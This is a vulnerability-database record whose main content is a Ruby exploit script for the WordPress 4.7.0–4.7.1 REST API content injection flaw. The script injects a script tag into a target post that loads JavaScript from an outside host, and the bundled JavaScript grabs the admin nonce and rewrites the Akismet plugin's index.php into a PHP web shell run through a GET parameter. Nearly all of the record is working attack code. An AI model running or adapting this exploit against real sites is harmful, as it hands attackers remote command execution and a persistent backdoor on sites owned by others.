{"id": "PACKETSTORM:140902", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress 4.7.0 / 4.7.1 Content Injection / Code Execution", "description": "", "published": "2017-02-02T00:00:00", "modified": "2017-02-02T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/140902/WordPress-4.7.0-4.7.1-Content-Injection-Code-Execution.html", "reporter": "Harsh Jaiswal", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2017-02-02T15:04:25", "viewCount": 262, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "_state": {"dependencies": 1678912935, "score": 1683820560, "epss": 1678924918}, "_internal": {"score_hash": "c4cd231ce6831f8e6e9e5ee6e0d05ffb"}, "sourceHref": "https://packetstormsecurity.com/files/download/140902/wp471-injectexec.txt", "sourceData": "`# Exploit Title: WP Content Injection Shell Exploit \n# Date: 31 Jan' 2017 \n# Exploit Author: Harsh Jaiswal \n# Vendor Homepage: http://wordpress.org \n# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2) \n# Tested on: Bacbox ubuntu Linux \n# Based on: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html \n# This will inject js in post, which on execution will change akismet plugin index.php file to our backdoor (brute parameter) :) \n# Credits : Marc, Sucuri, Brute \n# Lang : Ruby \n \nrequire 'rest-client' \nrequire 'json' \nputs \"Enter Target URI (With wp directory)\" \ntargeturi = gets.chomp \nputs \"Enter Post ID\" \npostid = gets.chomp.to_i \nresponse = RestClient.post( \n\"#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}\", \n{ \n\"id\" => \"#{postid}justtryingshell\", \n\"title\" => \"Shell Access Exploit\", \n\"content\" => \"Web shell access exploit <script src='http://yourjavascript.com/2211227783/wprce.js'></script>\" \n}.to_json, \n:content_type => :json, \n:accept => :json \n) {|response, request, result| response } \nif(response.code == 200) \nputs \"Done! After js execution in admin panel, you will have shell access at '#{targeturi}/wp-content/plugins/akismet/index.php?brute=id'\" \nelse \nputs \"This site is not Vulnerable\" \nend \n \n \n#--- wprce.js --- # \nx=new XMLHttpRequest() \np='/wp-admin/plugin-editor.php?' \nf='file=akismet/index.php' \nx.open('GET',p+f,0) \nx.send() \n$='_wpnonce='+/ce\" value=\"([^\"]*?)\"/.exec(x.responseText)[1]+'&newcontent=<?=`$_GET[brute]`;&action=update&'+f \nx.open('POST',p+f,1) \nx.setRequestHeader('Content-Type','application/x-www-form-urlencoded') \nx.send($) \n#--- EOF --- # \n \n`\n"}
{}